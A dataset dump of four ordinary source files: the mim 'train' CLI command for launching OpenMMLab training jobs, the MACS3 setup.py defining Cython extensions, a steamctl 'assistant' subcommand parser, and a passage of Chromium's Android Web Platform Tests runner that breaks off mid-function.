max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M)
---|---|---|---|---|
mim/commands/train.py | zhouzaida/mim | 188 | 75107 |
import os
import os.path as osp
import random as rd
import subprocess
from typing import Optional, Tuple, Union
import click
from mim.click import CustomCommand, param2lowercase
from mim.utils import (
echo_success,
exit_with_error,
get_installed_path,
highlighted_error,
is_installed,
module_full_name,
recursively_find,
)
@click.command(
name='train',
context_settings=dict(ignore_unknown_options=True),
cls=CustomCommand)
@click.argument('package', type=str, callback=param2lowercase)
@click.argument('config', type=str)
@click.option(
'-l',
'--launcher',
type=click.Choice(['none', 'pytorch', 'slurm'], case_sensitive=False),
default='none',
help='Job launcher')
@click.option(
'--port',
type=int,
default=None,
help=('The port used for inter-process communication (only applicable to '
'slurm / pytorch launchers). If set to None, will randomly choose '
'a port between 20000 and 30000. '))
@click.option(
'-G', '--gpus', type=int, default=1, help='Number of gpus to use')
@click.option(
'-g',
'--gpus-per-node',
type=int,
help=('Number of gpus per node to use '
'(only applicable to launcher == "slurm")'))
@click.option(
'-c',
'--cpus-per-task',
type=int,
default=2,
help='Number of cpus per task (only applicable to launcher == "slurm")')
@click.option(
'-p',
'--partition',
type=str,
help='The partition to use (only applicable to launcher == "slurm")')
@click.option(
'--srun-args', type=str, help='Other srun arguments that might be used')
@click.option('-y', '--yes', is_flag=True, help='Don’t ask for confirmation.')
@click.argument('other_args', nargs=-1, type=click.UNPROCESSED)
def cli(package: str,
config: str,
gpus: int,
gpus_per_node: int,
partition: str,
cpus_per_task: int = 2,
launcher: str = 'none',
port: int = None,
srun_args: Optional[str] = None,
yes: bool = False,
other_args: tuple = ()) -> None:
"""Perform Training.
Example:
\b
# Train models on a single server with CPU by setting `gpus` to 0 and
# 'launcher' to 'none' (if applicable). The training script of the
# corresponding codebase will fail if it doesn't support CPU training.
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 0
# Train models on a single server with one GPU
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 1
# Train models on a single server with 4 GPUs and pytorch distributed
> mim train mmcls resnet101_b16x8_cifar10.py --work-dir tmp --gpus 4 \
--launcher pytorch
# Train models on a slurm HPC with one 8-GPU node
> mim train mmcls resnet101_b16x8_cifar10.py --launcher slurm --gpus 8 \
--gpus-per-node 8 --partition partition_name --work-dir tmp
# Print help messages of sub-command train
> mim train -h
# Print help messages of sub-command train and the training script of mmcls
> mim train mmcls -h
"""
is_success, msg = train(
package=package,
config=config,
gpus=gpus,
gpus_per_node=gpus_per_node,
cpus_per_task=cpus_per_task,
partition=partition,
launcher=launcher,
port=port,
srun_args=srun_args,
yes=yes,
other_args=other_args)
if is_success:
echo_success(msg) # type: ignore
else:
exit_with_error(msg)
def train(
package: str,
config: str,
gpus: int,
gpus_per_node: int = None,
cpus_per_task: int = 2,
partition: str = None,
launcher: str = 'none',
port: int = None,
srun_args: Optional[str] = None,
yes: bool = True,
other_args: tuple = ()
) -> Tuple[bool, Union[str, Exception]]:
"""Train a model with given config.
Args:
package (str): The codebase name.
config (str): The config file path. If not exists, will search in the
config files of the codebase.
gpus (int): Number of gpus used for training.
gpus_per_node (int, optional): Number of gpus per node to use
(only applicable to launcher == "slurm"). Defaults to None.
cpus_per_task (int, optional): Number of cpus per task to use
(only applicable to launcher == "slurm"). Defaults to 2.
partition (str, optional): The partition name
(only applicable to launcher == "slurm"). Defaults to None.
launcher (str, optional): The launcher used to launch jobs.
Defaults to 'none'.
port (int | None, optional): The port used for inter-process
communication (only applicable to slurm / pytorch launchers).
Default to None. If set to None, will randomly choose a port
between 20000 and 30000.
srun_args (str, optional): Other srun arguments that might be
used, all arguments should be in a string. Defaults to None.
yes (bool): Don’t ask for confirmation. Default: True.
other_args (tuple, optional): Other arguments, will be passed to the
codebase's training script. Defaults to ().
"""
full_name = module_full_name(package)
if full_name == '':
msg = f"Can't determine a unique package given abbreviation {package}"
raise ValueError(highlighted_error(msg))
package = full_name
# If launcher == "slurm", the following args must be provided
if launcher == 'slurm':
msg = ('If launcher is slurm, '
'gpus-per-node and partition should not be None')
flag = (gpus_per_node is not None) and (partition is not None)
assert flag, msg
if port is None:
port = rd.randint(20000, 30000)
if launcher in ['slurm', 'pytorch']:
click.echo(f'Using port {port} for synchronization. ')
if not is_installed(package):
msg = (f'The codebase {package} is not installed, '
'do you want to install the latest release? ')
if yes or click.confirm(msg):
click.echo(f'Installing {package}')
cmd = ['mim', 'install', package]
ret = subprocess.check_call(cmd)
if ret != 0:
msg = f'{package} is not successfully installed'
raise RuntimeError(highlighted_error(msg))
else:
click.echo(f'{package} is successfully installed')
else:
msg = f'You can not train this model without {package} installed.'
return False, msg
pkg_root = get_installed_path(package)
if not osp.exists(config):
# Configs are placed in pkg/.mim since PR #68
config_root = osp.join(pkg_root, '.mim', 'configs')
if not osp.exists(config_root):
# If pkg/.mim/configs does not exist, search the whole pkg root.
config_root = pkg_root
# pkg/.mim/configs is a symbolic link to the real config folder,
# so we need to follow links.
files = recursively_find(
pkg_root, osp.basename(config), followlinks=True)
if len(files) == 0:
msg = (f"The path {config} doesn't exist and we can not find "
f'the config file in codebase {package}.')
raise ValueError(highlighted_error(msg))
elif len(files) > 1:
msg = (
f"The path {config} doesn't exist and we find multiple "
f'config files with same name in codebase {package}: {files}.')
raise ValueError(highlighted_error(msg))
# Use realpath instead of the symbolic path in pkg/.mim
config_path = osp.realpath(files[0])
click.echo(
f"The path {config} doesn't exist but we find the config file "
f'in codebase {package}, will use {config_path} instead.')
config = config_path
# Tools are placed in package/.mim since PR #68
train_script = osp.join(pkg_root, '.mim', 'tools', 'train.py')
if not osp.exists(train_script):
train_script = osp.join(pkg_root, 'tools', 'train.py')
common_args = ['--launcher', launcher] + list(other_args)
if launcher == 'none':
if gpus:
cmd = ['python', train_script, config, '--gpus',
str(gpus)] + common_args
else:
cmd = ['python', train_script, config, '--device', 'cpu'
] + common_args
elif launcher == 'pytorch':
cmd = [
'python', '-m', 'torch.distributed.launch',
f'--nproc_per_node={gpus}', f'--master_port={port}', train_script,
config
] + common_args
elif launcher == 'slurm':
parsed_srun_args = srun_args.split() if srun_args else []
has_job_name = any([('--job-name' in x) or ('-J' in x)
for x in parsed_srun_args])
if not has_job_name:
job_name = osp.splitext(osp.basename(config))[0]
parsed_srun_args.append(f'--job-name={job_name}_train')
cmd = [
'srun', '-p', f'{partition}', f'--gres=gpu:{gpus_per_node}',
f'--ntasks={gpus}', f'--ntasks-per-node={gpus_per_node}',
f'--cpus-per-task={cpus_per_task}', '--kill-on-bad-exit=1'
] + parsed_srun_args + ['python', '-u', train_script, config
] + common_args
cmd_text = ' '.join(cmd)
click.echo(f'Training command is {cmd_text}. ')
ret = subprocess.check_call(
cmd, env=dict(os.environ, MASTER_PORT=str(port)))
if ret == 0:
return True, 'Training finished successfully. '
else:
return False, 'Training did not finish successfully. '
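# Illustrative sketch (not part of the upstream module): train() can also be
# called programmatically instead of through the click CLI. The package and
# config names below are placeholders taken from the CLI examples above.
if __name__ == '__main__':
    ok, msg = train(
        package='mmcls',
        config='resnet101_b16x8_cifar10.py',
        gpus=1,
        other_args=('--work-dir', 'tmp'),
    )
    print(msg)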
|
setup.py | bgruening/MACS | 159 | 75141 |
<gh_stars>100-1000
#!/usr/bin/env python3
"""Description:
Setup script for MACS -- Model Based Analysis for ChIP-Seq data
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD License (see the file LICENSE included with
the distribution).
"""
import sys
import os
import re
from setuptools import setup, Extension
import subprocess
import sysconfig
import numpy
# get MACS version
exec(open("MACS3/Utilities/Constants.py").read())
# classifiers
classifiers =[\
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: Unix',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Cython', ]
install_requires = [ "numpy>=1.17",
"cykhash>=1.0.2",
"Cython>=0.29" ]
tests_requires = [ 'pytest' ]
def main():
if sys.version_info < (3, 6):
sys.stderr.write("CRITICAL: Python version must be >= 3.6!\n")
sys.exit(1)
# NumPy include dir
numpy_include_dir = [ numpy.get_include() ]
# CFLAG
# I intend to use -Ofast; however, if the gcc version is < 4.6 this option is unavailable, so...
# should I care about old gcc compilers?...
extra_c_args = ["-w","-Ofast", "-g0"] # for C, -Ofast implies -O3 and -ffast-math
# CFLAG for fermi-lite related codes
clang = False
icc = False
new_gcc = False
try:
if os.environ['CC'] == "clang":
clang = True
except KeyError:
pass
if not clang:
try:
gcc_version_check = subprocess.check_output( ["gcc", "--version"], universal_newlines=True)
if gcc_version_check.find("clang") != -1:
clang = True
else:
gcc_version_check = gcc_version_check.split('\n')[0] # get the first line
m = re.search( r"\s+(\d+\.\d+)\.\d+", gcc_version_check )
if m:
gcc_version = float( m[1] )
if gcc_version > 4.8:
new_gcc = True
except subprocess.CalledProcessError:
pass
try:
if os.environ['CC'] == "icc":
icc = True
except KeyError:
pass
extra_c_args_for_fermi = ["-std=gnu99","-DUSE_SIMDE", "-DSIMDE_ENABLE_NATIVE_ALIASES"]
if icc or sysconfig.get_config_vars()['CC'] == 'icc':
extra_c_args_for_fermi.extend(['-qopenmp-simd', '-DSIMDE_ENABLE_OPENMP'])
elif new_gcc or clang or sysconfig.get_config_vars()['CC'] == 'clang':
extra_c_args_for_fermi.extend(['-fopenmp-simd', '-DSIMDE_ENABLE_OPENMP'])
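# Summary of the detection above (comment added for clarity): the OpenMP-SIMD
# flag is only appended when the detected compiler (icc, clang, or gcc newer
# than 4.8) is known to support it; otherwise fermi-lite is built with just the
# plain SIMDE flags already in extra_c_args_for_fermi.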
# extensions; these have to be processed by Cython
ext_modules = [ \
# Signal
Extension("MACS3.Signal.Prob", ["MACS3/Signal/Prob.pyx"], libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.Pileup", ["MACS3/Signal/Pileup.pyx","MACS3/Signal/cPosValCalculation.c"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.PeakModel", ["MACS3/Signal/PeakModel.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PeakDetect", ["MACS3/Signal/PeakDetect.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.Signal.SignalProcessing", ["MACS3/Signal/SignalProcessing.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.FixWidthTrack", ["MACS3/Signal/FixWidthTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PairedEndTrack", ["MACS3/Signal/PairedEndTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.BedGraph", ["MACS3/Signal/BedGraph.pyx"], libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.ScoreTrack", ["MACS3/Signal/ScoreTrack.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args ),
Extension("MACS3.Signal.CallPeakUnit", ["MACS3/Signal/CallPeakUnit.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.VariantStat",["MACS3/Signal/VariantStat.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.ReadAlignment",["MACS3/Signal/ReadAlignment.pyx",],libraries=["m"],include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.RACollection",["MACS3/Signal/RACollection.pyx","MACS3/fermi-lite/bfc.c","MACS3/fermi-lite/bseq.c",\
"MACS3/fermi-lite/bubble.c","MACS3/fermi-lite/htab.c","MACS3/fermi-lite/ksw.c","MACS3/fermi-lite/kthread.c",\
"MACS3/fermi-lite/mag.c","MACS3/fermi-lite/misc.c","MACS3/fermi-lite/mrope.c","MACS3/fermi-lite/rld0.c",\
"MACS3/fermi-lite/rle.c","MACS3/fermi-lite/rope.c","MACS3/fermi-lite/unitig.c", "MACS3/Signal/swalign.c" ], \
libraries=["m","z"], include_dirs=numpy_include_dir+["./","./MACS3/fermi-lite/","./MACS3/Signal/"], extra_compile_args=extra_c_args+extra_c_args_for_fermi),
Extension("MACS3.Signal.UnitigRACollection",["MACS3/Signal/UnitigRACollection.pyx"],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PosReadsInfo",["MACS3/Signal/PosReadsInfo.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.Signal.PeakVariants",["MACS3/Signal/PeakVariants.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
# IO
Extension("MACS3.IO.Parser",["MACS3/IO/Parser.pyx"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args),
Extension("MACS3.IO.PeakIO", ["MACS3/IO/PeakIO.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.IO.BedGraphIO", ["MACS3/IO/BedGraphIO.pyx"], extra_compile_args=extra_c_args),
Extension("MACS3.IO.BAM",["MACS3/IO/BAM.pyx",],libraries=["m"], include_dirs=numpy_include_dir, extra_compile_args=extra_c_args) ]
with open("README.md", "r") as fh:
long_description = fh.read()
setup( name = "MACS3",
version = MACS_VERSION,
description = "Model Based Analysis for ChIP-Seq data",
long_description = long_description,
long_description_content_type = "text/markdown",
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://github.com/macs3-project/MACS/',
package_dir = {'MACS3' : 'MACS3'},
packages = ['MACS3', 'MACS3.IO', 'MACS3.Signal', 'MACS3.Commands','MACS3.Utilities'],
package_data = {'MACS3':['*.pxd']},
scripts = ['bin/macs3', ],
classifiers = classifiers,
install_requires = install_requires,
setup_requires = install_requires,
tests_require = tests_requires,
python_requires = '>=3.6',
ext_modules = ext_modules )
if __name__ == '__main__':
main()
|
steamctl/commands/assistant/__init__.py | rossengeorgiev/steamctl | 138 | 75144 |
<filename>steamctl/commands/assistant/__init__.py
from steamctl.argparser import register_command
epilog = """\
"""
@register_command('assistant', help='Helpful automation', epilog=epilog)
def cmd_parser(cp):
def print_help(*args, **kwargs):
cp.print_help()
cp.set_defaults(_cmd_func=print_help)
sub_cp = cp.add_subparsers(metavar='<subcommand>',
dest='subcommand',
title='List of sub-commands',
description='',
)
scp_i = sub_cp.add_parser("idle-games", help="Idle up to 32 games for game time")
scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_games')
scp_i.add_argument('app_ids', nargs='+', metavar='AppID', type=int, help='App ID(s) to idle')
scp_i = sub_cp.add_parser("idle-cards", help="Automatic idling for game cards")
scp_i.set_defaults(_cmd_func=__name__ + '.card_idler:cmd_assistant_idle_cards')
scp_i = sub_cp.add_parser("discovery-queue", help="Explore a single discovery queue")
scp_i.set_defaults(_cmd_func=__name__ + '.discovery_queue:cmd_assistant_discovery_queue')
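# Example CLI usage (illustrative only; the app IDs are placeholders):
#   steamctl assistant idle-games 440 570
#   steamctl assistant idle-cards
#   steamctl assistant discovery-queue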
|
testing/scripts/run_android_wpt.py | iridium-browser/iridium-browser | 575 | 75204 |
<reponame>iridium-browser/iridium-browser<filename>testing/scripts/run_android_wpt.py
#!/usr/bin/env vpython3
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs Web Platform Tests (WPT) on Android browsers.
This script supports running tests on the Chromium Waterfall by mapping isolated
script flags to WPT flags.
It is also useful for local reproduction by performing APK installation and
configuring the browser to resolve test hosts. Be sure to invoke this
executable directly rather than using python run_android_wpt.py so that
WPT dependencies in Chromium vpython are found.
If you need more advanced test control, please use the runner located at
//third_party/wpt_tools/wpt/wpt.
Here's the mapping [isolate script flag] : [wpt flag]
--isolated-script-test-output : --log-chromium
--total-shards : --total-chunks
--shard-index : --this-chunk
"""
# TODO(aluo): Combine or factor out common parts with the run_wpt_tests.py script.
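# Illustrative local invocation (assumed; the flag names come from the argument
# parser defined below, while the --product value and file paths are
# placeholders for your own build outputs):
#
#   testing/scripts/run_android_wpt.py \
#       --product=android_webview \
#       --webdriver-binary=out/Release/chromedriver \
#       --system-webview-shell=out/Release/apks/SystemWebViewShell.apk \
#       --include external/wpt/html/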
import argparse
import contextlib
import json
import logging
import os
import shutil
import sys
import common
import wpt_common
logger = logging.getLogger(__name__)
SRC_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
BUILD_ANDROID = os.path.join(SRC_DIR, 'build', 'android')
BLINK_TOOLS_DIR = os.path.join(
SRC_DIR, 'third_party', 'blink', 'tools')
CATAPULT_DIR = os.path.join(SRC_DIR, 'third_party', 'catapult')
DEFAULT_WPT = os.path.join(
SRC_DIR, 'third_party', 'wpt_tools', 'wpt', 'wpt')
PYUTILS = os.path.join(CATAPULT_DIR, 'common', 'py_utils')
if PYUTILS not in sys.path:
sys.path.append(PYUTILS)
if BLINK_TOOLS_DIR not in sys.path:
sys.path.append(BLINK_TOOLS_DIR)
if BUILD_ANDROID not in sys.path:
sys.path.append(BUILD_ANDROID)
import devil_chromium
from blinkpy.web_tests.port.android import (
PRODUCTS, PRODUCTS_TO_EXPECTATION_FILE_PATHS, ANDROID_WEBLAYER,
ANDROID_WEBVIEW, CHROME_ANDROID, ANDROID_DISABLED_TESTS)
from devil import devil_env
from devil.android import apk_helper
from devil.android import device_utils
from devil.android.tools import system_app
from devil.android.tools import webview_app
from pylib.local.emulator import avd
from py_utils.tempfile_ext import NamedTemporaryDirectory
class PassThroughArgs(argparse.Action):
pass_through_args = []
def __call__(self, parser, namespace, values, option_string=None):
if option_string:
if self.nargs == 0:
self.add_unique_pass_through_arg(option_string)
elif self.nargs is None:
self.add_unique_pass_through_arg('{}={}'.format(option_string, values))
else:
raise ValueError("nargs {} not supported: {} {}".format(
self.nargs, option_string, values))
@classmethod
def add_unique_pass_through_arg(cls, arg):
if arg not in cls.pass_through_args:
cls.pass_through_args.append(arg)
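# Note (added for clarity): each adapter's add_extra_arguments() defines
# subclasses whose class-level pass_through_args points at its own list, so an
# option such as "--repeat 3" is recorded as "--repeat=3" and later appended
# verbatim to the wpt command line via rest_args.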
def _get_adapter(product, device):
if product == ANDROID_WEBLAYER:
return WPTWeblayerAdapter(device)
elif product == ANDROID_WEBVIEW:
return WPTWebviewAdapter(device)
else:
return WPTClankAdapter(device)
class WPTAndroidAdapter(wpt_common.BaseWptScriptAdapter):
def __init__(self, device):
self.pass_through_wpt_args = []
self.pass_through_binary_args = []
self._metadata_dir = None
self._device = device
super(WPTAndroidAdapter, self).__init__()
# Arguments from add_extra_arguments were added, so
# it's safe to parse the arguments and set self._options
self.parse_args()
self.output_directory = os.path.join(SRC_DIR, 'out', self.options.target)
self.mojo_js_directory = os.path.join(self.output_directory, 'gen')
@property
def rest_args(self):
rest_args = super(WPTAndroidAdapter, self).rest_args
# Here we add all of the arguments required to run WPT tests on Android.
rest_args.extend([self.options.wpt_path])
# By default, WPT will treat unexpected passes as errors, so we disable
# that to be consistent with Chromium CI.
rest_args.extend(["--no-fail-on-unexpected-pass"])
# vpython has packages needed by wpt, so force it to skip the setup
rest_args.extend(["--venv=" + SRC_DIR, "--skip-venv-setup"])
rest_args.extend(["run",
"--tests=" + wpt_common.EXTERNAL_WPT_TESTS_DIR,
"--test-type=" + self.options.test_type,
"--device-serial", self._device.serial,
"--webdriver-binary",
self.options.webdriver_binary,
"--headless",
"--no-pause-after-test",
"--no-capture-stdio",
"--no-manifest-download",
"--binary-arg=--enable-blink-features=MojoJS,MojoJSTest",
"--binary-arg=--enable-blink-test-features",
"--binary-arg=--disable-field-trial-config",
"--enable-mojojs",
"--mojojs-path=" + self.mojo_js_directory,
])
# if metadata was created then add the metadata directory
# to the list of wpt arguments
if self._metadata_dir:
rest_args.extend(['--metadata', self._metadata_dir])
if self.options.verbose >= 3:
rest_args.extend(["--log-mach=-", "--log-mach-level=debug",
"--log-mach-verbose"])
if self.options.verbose >= 4:
rest_args.extend(['--webdriver-arg=--verbose',
'--webdriver-arg="--log-path=-"'])
rest_args.extend(self.pass_through_wpt_args)
return rest_args
@property
def browser_specific_expectations_path(self):
raise NotImplementedError
def _extra_metadata_builder_args(self):
args = ['--additional-expectations=%s' % path
for path in self.options.additional_expectations]
if not self.options.ignore_browser_specific_expectations:
args.extend(['--additional-expectations',
self.browser_specific_expectations_path])
return args
def _maybe_build_metadata(self):
metadata_builder_cmd = [
sys.executable,
os.path.join(wpt_common.BLINK_TOOLS_DIR, 'build_wpt_metadata.py'),
'--android-product',
self.options.product,
'--metadata-output-dir',
self._metadata_dir,
'--additional-expectations',
ANDROID_DISABLED_TESTS,
'--use-subtest-results',
]
if self.options.ignore_default_expectations:
metadata_builder_cmd += [ '--ignore-default-expectations' ]
metadata_builder_cmd.extend(self._extra_metadata_builder_args())
return common.run_command(metadata_builder_cmd)
def run_test(self):
with NamedTemporaryDirectory() as tmp_dir, self._install_apks():
self._metadata_dir = os.path.join(tmp_dir, 'metadata_dir')
metadata_command_ret = self._maybe_build_metadata()
if metadata_command_ret != 0:
return metadata_command_ret
# If there is no metadata then we need to create an
# empty directory to pass to wptrunner
if not os.path.exists(self._metadata_dir):
os.makedirs(self._metadata_dir)
return super(WPTAndroidAdapter, self).run_test()
def _install_apks(self):
raise NotImplementedError
def clean_up_after_test_run(self):
# Avoid having a dangling reference to the temp directory
# which was deleted
self._metadata_dir = None
def add_extra_arguments(self, parser):
# TODO: |pass_through_args| are broken and need to be supplied by way of
# --binary-arg.
class BinaryPassThroughArgs(PassThroughArgs):
pass_through_args = self.pass_through_binary_args
class WPTPassThroughArgs(PassThroughArgs):
pass_through_args = self.pass_through_wpt_args
# Add this so that product argument does not go in self._rest_args
# when self.parse_args() is called
parser.add_argument('--target', '-t', default='Release',
help='Specify the target build subdirectory under'
' src/out/.')
parser.add_argument('--product', help=argparse.SUPPRESS)
parser.add_argument('--webdriver-binary', required=True,
help='Path of the webdriver binary. It needs to have'
' the same major version as the apk.')
parser.add_argument('--wpt-path', default=DEFAULT_WPT,
help='Controls the path of the WPT runner to use'
' (and therefore the tests). Defaults to the revision'
' rolled into Chromium.')
parser.add_argument('--additional-expectations',
action='append', default=[],
help='Paths to additional test expectations files.')
parser.add_argument('--ignore-default-expectations', action='store_true',
help='Do not use the default set of'
' TestExpectations files.')
parser.add_argument('--ignore-browser-specific-expectations',
action='store_true', default=False,
help='Ignore browser specific expectation files.')
parser.add_argument('--test-type', default='testharness',
help='Specify to experiment with other test types.'
' Currently only the default is expected to work.')
parser.add_argument('--verbose', '-v', action='count', default=0,
help='Verbosity level.')
parser.add_argument('--repeat',
action=WPTPassThroughArgs, type=int,
help='Number of times to run the tests.')
parser.add_argument('--include', metavar='TEST_OR_DIR',
action=WPTPassThroughArgs,
help='Test(s) to run, defaults to run all tests.')
parser.add_argument('--include-file',
action=WPTPassThroughArgs,
help='A file listing test(s) to run')
parser.add_argument('--list-tests', action=WPTPassThroughArgs, nargs=0,
help="Don't run any tests, just print out a list of"
' tests that would be run.')
parser.add_argument('--webdriver-arg', action=WPTPassThroughArgs,
help='WebDriver args.')
parser.add_argument('--log-wptreport', metavar='WPT_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log wptreport with subtest details.")
parser.add_argument('--log-raw', metavar='RAW_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log raw report.")
parser.add_argument('--log-html', metavar='HTML_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log html report.")
parser.add_argument('--log-xunit', metavar='XUNIT_REPORT_FILE',
action=WPTPassThroughArgs,
help="Log xunit report.")
parser.add_argument('--enable-features', action=BinaryPassThroughArgs,
help='Chromium features to enable during testing.')
parser.add_argument('--disable-features', action=BinaryPassThroughArgs,
help='Chromium features to disable during testing.')
parser.add_argument('--disable-field-trial-config',
action=BinaryPassThroughArgs,
help='Disable test trials for Chromium features.')
parser.add_argument('--force-fieldtrials', action=BinaryPassThroughArgs,
help='Force trials for Chromium features.')
parser.add_argument('--force-fieldtrial-params',
action=BinaryPassThroughArgs,
help='Force trial params for Chromium features.')
add_emulator_args(parser)
class WPTWeblayerAdapter(WPTAndroidAdapter):
WEBLAYER_SHELL_PKG = 'org.chromium.weblayer.shell'
WEBLAYER_SUPPORT_PKG = 'org.chromium.weblayer.support'
@contextlib.contextmanager
def _install_apks(self):
install_weblayer_shell_as_needed = maybe_install_user_apk(
self._device, self.options.weblayer_shell, self.WEBLAYER_SHELL_PKG)
install_weblayer_support_as_needed = maybe_install_user_apk(
self._device, self.options.weblayer_support, self.WEBLAYER_SUPPORT_PKG)
install_webview_provider_as_needed = maybe_install_webview_provider(
self._device, self.options.webview_provider)
with install_weblayer_shell_as_needed, \
install_weblayer_support_as_needed, \
install_webview_provider_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[ANDROID_WEBLAYER]
def add_extra_arguments(self, parser):
super(WPTWeblayerAdapter, self).add_extra_arguments(parser)
parser.add_argument('--weblayer-shell',
help='WebLayer Shell apk to install.')
parser.add_argument('--weblayer-support',
help='WebLayer Support apk to install.')
parser.add_argument('--webview-provider',
help='Webview provider apk to install.')
@property
def rest_args(self):
args = super(WPTWeblayerAdapter, self).rest_args
args.append(ANDROID_WEBLAYER)
return args
class WPTWebviewAdapter(WPTAndroidAdapter):
def __init__(self, device):
super(WPTWebviewAdapter, self).__init__(device)
if self.options.system_webview_shell is not None:
self.system_webview_shell_pkg = apk_helper.GetPackageName(
self.options.system_webview_shell)
else:
self.system_webview_shell_pkg = 'org.chromium.webview_shell'
@contextlib.contextmanager
def _install_apks(self):
install_shell_as_needed = maybe_install_user_apk(
self._device, self.options.system_webview_shell,
self.system_webview_shell_pkg)
install_webview_provider_as_needed = maybe_install_webview_provider(
self._device, self.options.webview_provider)
with install_shell_as_needed, install_webview_provider_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[ANDROID_WEBVIEW]
def add_extra_arguments(self, parser):
super(WPTWebviewAdapter, self).add_extra_arguments(parser)
parser.add_argument('--system-webview-shell',
help=('System WebView Shell apk to install. If not '
'specified then the on-device WebView apk '
'will be used.'))
parser.add_argument('--webview-provider',
help='Webview provider APK to install.')
@property
def rest_args(self):
args = super(WPTWebviewAdapter, self).rest_args
args.extend(['--package-name', self.system_webview_shell_pkg])
args.append(ANDROID_WEBVIEW)
return args
class WPTClankAdapter(WPTAndroidAdapter):
@contextlib.contextmanager
def _install_apks(self):
install_clank_as_needed = maybe_install_user_apk(
self._device, self.options.chrome_apk)
with install_clank_as_needed:
yield
@property
def browser_specific_expectations_path(self):
return PRODUCTS_TO_EXPECTATION_FILE_PATHS[CHROME_ANDROID]
def add_extra_arguments(self, parser):
super(WPTClankAdapter, self).add_extra_arguments(parser)
parser.add_argument(
'--chrome-apk', help='Chrome apk to install.')
parser.add_argument(
'--chrome-package-name',
help=('The package name of Chrome to test,'
' defaults to that of the compiled Chrome apk.'))
@property
def rest_args(self):
args = super(WPTClankAdapter, self).rest_args
if not self.options.chrome_package_name and not self.options.chrome_apk:
raise Exception('Either the --chrome-package-name or --chrome-apk '
'command line arguments must be used.')
if not self.options.chrome_package_name:
self.options.chrome_package_name = apk_helper.GetPackageName(
self.options.chrome_apk)
logger.info("Using Chrome apk's default package %s." %
self.options.chrome_package_name)
args.extend(['--package-name', self.options.chrome_package_name])
# add the product positional argument
args.append(CHROME_ANDROID)
return args
def maybe_install_webview_provider(device, apk):
if apk:
logger.info('Will install WebView apk at ' + apk)
return webview_app.UseWebViewProvider(device, apk)
else:
return no_op()
def maybe_install_user_apk(device, apk, expected_pkg=None):
"""contextmanager to install apk on device.
Args:
device: DeviceUtils instance on which to install the apk.
apk: Apk file path on host.
expected_pkg: Optional, check that apk's package name matches.
Returns:
If apk evaluates to false, returns a do-nothing contextmanager.
Otherwise, returns a contextmanager to install apk on device.
"""
if apk:
pkg = apk_helper.GetPackageName(apk)
if expected_pkg and pkg != expected_pkg:
raise ValueError('{} has incorrect package name: {}, expected {}.'.format(
apk, pkg, expected_pkg))
install_as_needed = app_installed(device, apk, pkg)
logger.info('Will install ' + pkg + ' at ' + apk)
else:
install_as_needed = no_op()
return install_as_needed
@contextlib.contextmanager
def app_installed(device, apk, pkg):
device.Install(apk)
try:
yield
finally:
device.Uninstall(pkg)
# Dummy contextmanager to simplify multiple optional managers.
@contextlib.contextmanager
def no_op():
yield
# This is not really a "script test", so it does not need to manually add
# any additional compile targets.
def main_compile_targets(args):
json.dump([], args.output)
@contextlib.contextmanager
def get_device(args):
instance = None
try:
if args.avd_config:
avd_config = avd.AvdConfig(args.avd_config)
logger.warning('Install emulator from ' + args.avd_config)
avd_config.Install()
instance = avd_config.CreateInstance()
instance.Start(writable_system=True, window=args.emulator_window)
device_utils.DeviceUtils(instance.serial).WaitUntilFullyBooted()
# TODO(weizhong): when choosing a device, make sure the ABI matches the target
devices = device_utils.DeviceUtils.HealthyDevices()
if devices:
yield devices[0]
else:
yield
finally:
if instance:
instance.Stop()
def add_emulator_args(parser):
parser.add_argument(
'--avd-config',
type=os.path.realpath,
help='Path to the avd config textpb. '
'(See //tools/android/avd/proto/ for message definition'
' and existing textpb files.)')
parser.add_argument(
